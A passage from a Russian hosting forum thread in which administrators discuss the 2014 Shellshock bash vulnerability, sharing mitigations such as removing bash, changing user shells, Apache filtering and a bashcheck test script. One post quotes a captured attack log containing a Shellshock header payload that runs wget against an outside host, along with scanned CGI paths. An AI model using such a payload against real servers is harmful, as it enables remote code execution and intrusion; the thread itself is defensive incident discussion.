Форум Сайтостроение Хостинг

Критическая уязвимость в bash

1 234567
L
На сайте с 07.12.2007
Offline
351
Ladycharm
#51
Romka_Kharkov:
Меня интересует в первую очередь возможность удаленного использования данной уязвимости, кроме как через apache (cgi) есть возможность им пользоваться

Сегодня в логах сайта обнаружены запросы с IP: 62.210.75.170

GET / HTTP/1.1" 200 31774 "() { :; }; wget http:// creditstat.ru/bnZiLnJ1U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http:// creditstat.ru/bnZiLnJ1U2hlbGxTaG9ja1NhbHQ= >> /dev/null
сканируют морду и url:
/
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-mod/index.cgi
/cgi-bin-sdb/printenv

PS: http:// creditstat.ru МНОЙ вставлен пробел, чтобы не делать ссылку на вредителя

Вырезать можно прямо Апачем, регуляркой по SetEnvIfNoCase

Googlebot всё ещё не Google уже сканирует больше В Яндекс Вебмастере появился
Glueon
На сайте с 26.07.2013
Offline
172
Glueon
#52

У кого стоит modsecurity - он реагирует на такого рода странности в заголовках?

Есть много IP-сетей в аренду под прокси, парсинг, рассылки (optin), vpn и хостинг. Телега: @contactroot ⚒ ContactRoot команда опытных сисадминов (/ru/forum/861038), свой LIR: сдаем в аренду сети IPv4/v6 (/ru/forum/1012475).
MU
На сайте с 01.10.2013
Offline
43
MNERU
#53
ENELIS:


Можно на c написать фильтр и вписать его в pf loop

Или же тупо соединяться с bpf и работать напрямую
модулем ng_bpf
http://nuclight.livejournal.com/124989.html

или на с++ях
http://bastian.rieck.ru/howtos/bpf/

или через pfil, что еще проще и быстрее (даже пример есть)
http://www.enderunix.org/docs/en/pfil_hook.html

Просто никто этим не занимался, но это довольно просто.

Можно включить bpf zero-copy и подключить через python scapy и фильтровать пакеты через питона.

Ключевыми словами из моего поста были "штатные" и "из коробки". Я-то про bpf в курсе, а человек, которому я отвечал до этого - вряд ли.

---------- Добавлено 29.09.2014 в 22:30 ----------

Кстати, если кто не в курсе "веселье" продолжается.

Новые уязвимости в bash - CVE-2014-6277, CVE-2014-6278, CVE-2014-7186, CVE-2014-7187.

Все вокруг одного и того же.

Хостинг на SSD от 49 руб./мес. (http://mne.ru/services/virt_hosting.shtml) + бесплатный SSL VPS/VDS на SSD в России от 75 руб./мес. (http://mne.ru/services/vps.shtml) Скидка 10% на хостинг и VPS по промокоду — SEARCHENGINES
Интернет-курс «SEO+Манимэйкинг-2013 1.0»: для Надёжный хостинг от ns-center.ru Новый курс: Большие деньги
Glueon
На сайте с 26.07.2013
Offline
172
Glueon
#54

Остается только надеяться, что ранее нас планомерно не имели через эти дыры :)

Судорожно пересматриваю логи с последние много месяцев. Надо было ставить анализатор заголовков ...

Romka_Kharkov
На сайте с 08.04.2009
Offline
485
Romka_Kharkov
#55

По моему пришло время прощаться с bash до лучших времен :D А он мне так нравился :D

Есть около 15.000 ipv4 !!! (http://onyx.net.ua/price.php#ipv4) Качественный хостинг с 2005 года - лучшее клиентам! (http://onyx.net.ua/)
ENELIS
На сайте с 29.08.2008
Offline
194
ENELIS
#56

MNERU на бсд баш ставится в /usr/local/ так что текущие атаки не сработают, но по-хорошему советую сделать всем 

pkg_delete bash\*
или 
pkg delete bash\*
в зависимости от версии оси.

+ выполнить следующую команду

awk -F ":" '$3 > 999 && $3 < 65534 && ( $7 == "/bin/bash" || $7 == "/usr/local/bin/bash" ) {print $1}' /etc/passwd | xargs -I % chsh -s /bin/sh %

Иногда баш ставится с кривыми софтинами, которые пишут скрипты на баш для конфигурирования.

Еще оно ставится с xmlto - сносить, сносить, сносить.

С Уважением, ServerAstra.ru (https://serverastra.com) - VPS и выделенные сервера в Будапеште по выгодным ценам!
На главной Яндекса появился Яндекс покажет результаты голосования Google тестирует результаты поиска
_
На сайте с 24.03.2008
Offline
381
_SP_
#57

А как-нибудь cgi и апача от баша отрезать нельзя ?

Чтобы забыть как о страшном сне.

Ммм... а удаление

LoadModule cgi_module modules/mod_cgi.so

позволит на корню прибить все cgi ?

где они вообще могут использоваться ? awstat какой-нибудь ?

AdWords: удаление функции предпочтительной Facebook позволит заявлять права Карты Google позволили управлять
lealhost
На сайте с 07.06.2014
Offline
136
lealhost
#58
_SP_:
А как-нибудь cgi и апача от баша отрезать нельзя ?
Чтобы забыть как о страшном сне.

Да здравствует: chmod 750 /bin/bash

Не забываем, что это заблокирует SSH доступ к оболочке от пользователей.

_
На сайте с 24.03.2008
Offline
381
_SP_
#59
lealhost:
Да здравствует: chmod 750 /bin/bash
Не забываем, что это заблокирует SSH доступ к оболочке от пользователей.

Да и фиг бы с ними.

Но не помогло, в том смысле, что какие-то дремучие фреймворки "падают",

вероятно перл как-то баш использует, пока не могу сообразить как.

А всё современное вроде бы работает нормально.

Хехе.. выяснилось что в моей centos - sh это просто ссылка на баш :).

Но с другой стороны, она похоже "сама" обновилась до нормальной версии без уязвимости.

В плагине Easy WP Google советует быть консервативными Разработчики WordPress принудительно обновили
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#60

тест на уязвимости https://github.com/hannob/bashcheck

wget https://github.com/hannob/bashcheck/archive/master.zip
unzip master.zip
sh bashcheck-master/bashcheck
аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
1 234567

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий